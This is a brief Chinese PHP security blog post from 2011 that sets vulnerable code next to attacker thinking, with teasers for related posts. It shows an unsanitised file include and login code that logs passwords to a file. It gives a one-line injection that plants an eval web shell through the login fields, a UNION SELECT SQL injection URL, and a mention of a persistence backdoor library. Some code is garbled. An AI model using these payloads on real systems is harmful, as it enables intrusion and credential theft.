//2011-11-16 星期三// 程式設計師的思維:
// micropoor.php ---**片段
<?php
$micropoor=$_get[micropoor];
include($micropoor.'php');
?>
//我們的思維:
[url]
// 程式設計師的思維:
// micropoor.php ---**片段
<?php
//略
$fp = fopen($cachefile, 'w');
fwrite($fp, $myvalues);
fclose($fp);
//略
?>
---**片段
<?php
$username=$_post[『username』];
$password=$_post[『password』];
$centent=time().」使用者名稱$username登入錯誤,登入密碼為:$password」;
$sql=….
if(!=)
?>
//我們的思維:
*post: username or password inject -> <?php%20eval($_post[micropoor])%20?>
PHP安全新聞早8點 1120
2011 11 20 星期日 插入篇 asp篇 程式設計師的思維 micropoor.asp 片段 dim upload,file,formname,formpath,icount,fileformat 略 end function formpath 2010 略 set file upload.f...
PHP安全新聞早8點 1113
2011 11 13 星期日 程式設計師的思維 micropoor.php 片段 id get id query select from users where id id.略 我們的思維 index.php?id 1 union select 1,version from users 程式設計師的...
php安全新聞早八點 Microdoor 第三季
microdoor系列分為持續滲透的許可權把控系列,部分為目前已成熟的輪子。會持續更新下去。php5.x x32 backdoor for linux public x32.so size 26127 bytes md5 9bf67665fdcb30c355358624dbeb79bb sha1 3...